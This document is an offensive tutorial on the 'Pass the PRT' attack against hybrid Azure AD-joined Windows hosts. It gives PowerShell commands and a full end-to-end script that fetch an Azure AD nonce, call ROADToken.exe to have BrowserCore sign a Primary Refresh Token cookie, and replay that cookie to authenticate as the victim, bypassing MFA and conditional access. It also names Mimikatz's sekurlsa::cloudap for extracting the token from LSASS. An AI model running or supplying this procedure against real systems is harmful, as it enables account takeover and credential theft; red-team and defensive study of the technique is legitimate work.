Pass the PRT

This attack targets devices with Azure AD SSO enabled in hybrid Azure environments, i.e. hybrid-joined Windows hosts that hold a Primary Refresh Token (PRT). A PRT can be exchanged for tokens to any application the user can reach, carries the device identity and, when the user satisfied MFA at sign-in (for example with Windows Hello for Business), an MFA claim, so it satisfies conditional access policies that require a compliant or hybrid-joined device or MFA without the attacker ever completing MFA.

It leverages a component that is present on every SSO-enabled Windows device: BrowserCore.exe, the native messaging host behind the Windows 10 Accounts browser extension. On request it returns a PRT cookie, a JWT that wraps the PRT and is signed with the session key held by LSASS (CloudAP). BrowserCore will only do this for a fresh nonce issued by Azure AD, so the attacker first requests a nonce from login.microsoftonline.com and then passes it to BrowserCore, which hands back the signed cookie ready to be replayed.

To perform the attack we'll use ROADtoken (by Dirk-jan Mollema), though Mimikatz can be used as well. Checking whether SSO is enabled on a host is as simple as running

Dsregcmd.exe /status

The AzureAdJoined field (under Device State) and the AzureAdPrt field (under SSO State) should both be YES; on a hybrid-joined host DomainJoined is YES as well. If AzureAdPrt is NO there is no PRT in LSASS and BrowserCore has nothing to sign.

If the host satisfies these conditions we can go ahead and request a session nonce. The nonce comes from the token endpoint with the special grant type srv_challenge:

PS /home/otter> $tenantId = "<tenant_id>"   # a tenant GUID; "common" also works
PS /home/otter> $url = "https://login.microsoftonline.com/$tenantId/oauth2/token"
PS /home/otter> $params = @{
>> "URI" = $url
>> "Method" = "POST"
>> }
PS /home/otter> $body = @{
>> "grant_type" = "srv_challenge"
>> }
PS /home/otter> # splat $params with @ so URI and Method bind as named parameters
PS /home/otter> $result = Invoke-RestMethod @params -UseBasicParsing -Body $body
PS /home/otter> $result.Nonce

With the nonce value we can request an actual PRT

PS /home/otter> .\ROADToken.exe "<nonce>"

This returns a JSON object whose x-ms-RefreshTokenCredential entry holds the signed PRT cookie (a JWT). Set it as a cookie of that name on login.microsoftonline.com, or hand it to ROADtools (roadrecon auth --prt-cookie), to authenticate as the user. The nonce embedded in the cookie is only accepted for a short time, so use it promptly.
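The whole procedure as one script, added here as an example and not part of the original page or of ROADtoken itself. It runs on the SSO-enabled Windows host in the user's session, checks dsregcmd /status, fetches a nonce, calls ROADToken.exe and then decodes the returned cookie to confirm it really carries the nonce we supplied. Assumptions (labelled in the code): ROADToken.exe sits in the current directory and prints JSON of the shape {"response":[{"name":"x-ms-RefreshTokenCredential","data":"<jwt>"}]}, and the cookie JWT payload contains the request_nonce, is_primary and iat claims; adjust the parsing if your tool version prints something else.

```powershell
# Added example: end-to-end Pass-the-PRT cookie collection from the local host.
# Assumptions: ROADToken.exe is in the current directory and its output is
# {"response":[{"name":"x-ms-RefreshTokenCredential","data":"<jwt>", ...}]};
# the cookie payload carries request_nonce / is_primary / iat.
param(
    [string]$TenantId = 'common',          # tenant GUID, or 'common'
    [string]$RoadTokenPath = '.\ROADToken.exe'
)

function Test-PrtPresent {
    # Parse dsregcmd /status; we need AzureAdJoined : YES and AzureAdPrt : YES.
    $fields = @{}
    foreach ($line in (dsregcmd.exe /status)) {
        if ($line -match '^\s*(AzureAdJoined|AzureAdPrt|DomainJoined)\s*:\s*(\S+)') {
            $fields[$Matches[1]] = $Matches[2]
        }
    }
    return ($fields['AzureAdJoined'] -eq 'YES' -and $fields['AzureAdPrt'] -eq 'YES')
}

function Get-SsoNonce {
    # grant_type=srv_challenge returns {"Nonce":"..."} without any credential.
    param([string]$Tenant)
    $resp = Invoke-RestMethod -Method Post `
        -Uri "https://login.microsoftonline.com/$Tenant/oauth2/token" `
        -Body @{ grant_type = 'srv_challenge' }
    return $resp.Nonce
}

function ConvertFrom-Base64Url {
    # JWT segments are base64url without padding; restore padding before decoding.
    param([string]$Text)
    $s = $Text.Replace('-', '+').Replace('_', '/')
    switch ($s.Length % 4) { 2 { $s += '==' } 3 { $s += '=' } }
    return [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($s))
}

function Get-PrtCookie {
    # Ask BrowserCore (via ROADToken.exe) to sign a PRT cookie for this nonce.
    param([string]$Nonce, [string]$ToolPath)
    $json = (& $ToolPath $Nonce | Out-String) | ConvertFrom-Json
    $entry = $json.response | Where-Object { $_.name -eq 'x-ms-RefreshTokenCredential' }
    if (-not $entry) { throw 'No x-ms-RefreshTokenCredential in BrowserCore response' }
    return $entry.data
}

if (-not (Test-PrtPresent)) { throw 'Host is not Azure AD joined with a PRT; nothing to pass.' }

$nonce  = Get-SsoNonce -Tenant $TenantId
$cookie = Get-PrtCookie -Nonce $nonce -ToolPath $RoadTokenPath

# Sanity check: the cookie is a three-part JWT whose payload echoes our nonce.
$header, $payload, $signature = $cookie.Split('.')
$claims = ConvertFrom-Base64Url $payload | ConvertFrom-Json
if ($claims.request_nonce -ne $nonce) { throw 'Cookie nonce does not match the nonce we requested' }

"Header : $(ConvertFrom-Base64Url $header)"
"Claims : is_primary=$($claims.is_primary) iat=$($claims.iat) request_nonce=$($claims.request_nonce)"
"Cookie : x-ms-RefreshTokenCredential=$cookie"
```

The nonce check matters in practice: a cookie signed for a stale or different nonce is rejected by Azure AD, so verifying it locally saves a failed replay. The PRT inside the refresh_token claim is never decrypted here; the signature produced by CloudAP over the nonce is what makes the cookie usable.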

As mentioned, this attack can also be pulled off with Mimikatz. The process is longer (the PRT and its session key are pulled from LSASS with sekurlsa::cloudap and the cookie is assembled by hand) but it gives a better view of how the browser extension's tokens are created.

To learn more about the process I suggest reading this post.
